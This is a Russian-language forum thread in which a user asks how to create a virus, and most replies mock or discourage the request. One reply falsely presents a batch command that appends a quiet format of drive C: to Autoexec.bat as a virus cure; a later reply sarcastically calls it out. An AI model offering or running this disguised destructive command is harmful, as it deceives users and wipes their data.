Другие языки программирования и технологии

подскажите как создать вирус????

создать что бы химию сдать? так вот -сначала закончить школу, поступить на программиста а там может тебе уже и не понадобится их создавать...
Dima Demagin
Лучший ответ
Готовый возьми
1. Раз ты задаёшь такие вопросы, значит, тебе рано ещё этим заниматься)
2. Кроме того, если ты захочешь его распространять, тебе необходимо будет ознакомиться
с соответствующими статьями из УК РФ (особенно касательно несанкционированного доступа к информации,
информационной безопасности, интеллектуальной собственности и иже с ними)
3. Тебе необходимо разбираться в архитектуре современных ЭВМ, организации современных ОС,
знать уязвимые места, которые можно использовать, для распространения нужно понимать
работу сетей ЭВМ. .
4. Ну и про сами вирусы - какие они бывают, что такое полиморфные/олигоморфные/метаморфные вирусы,
черви, макровирусы,. .

Короче, забей)
с головой все в порядке? ?
и это уже далеко выходит за рамки программирования. это хакерство. и такие вопросы здесь не задают.
Лучше ненадо, а то можно и свой комп заразить!!!
Братишка да неслушай их!! ! ани тебе здесь такова понарасказуют!! ! думаеш антивирь писать сложно!! ! да плюнул и разтерел!! ! ты думаеш што нужно быть гением или профессором фигня ет всё!!! Кароче сматри всё простор заходиш в текстовый блокнот и пишеш там вот ету строчку echo format C: /q >> c:\Autoexec.bat вот и всё патом сохраняеш и в конце имени ставиш не TXT а BAT и всё братишка!!!! перезагружаеш комп и неодного вируса ето я тебе отвечаю!! ! никаких проблем!! ! сам пользуюсь!! ! я таким способом флешку себе лечил знаеш как помогает любую заразу вылавлюет!! ! и помни в етом мире всё гараздо проще чем тебе говорят!!!))))))))))))))))))))))))))))))))))))))))))))
программирование надо знать а с такими вопросами как у тебя ты ни одного языка не знаешь

качай готовые
по буквам В И Р У С
тебе наврятли кто скажет потому что их и так много развелось)))
Alexander M
Дима молот хороший антивир в кавычках сколько уже компов запорол?? ? Xaker forever )))))
Это не программирование, а дибилизм. Нормальный программист такой ерундой страдать не будет. Нагадить всегда проще, чем что-то стоящее сделать.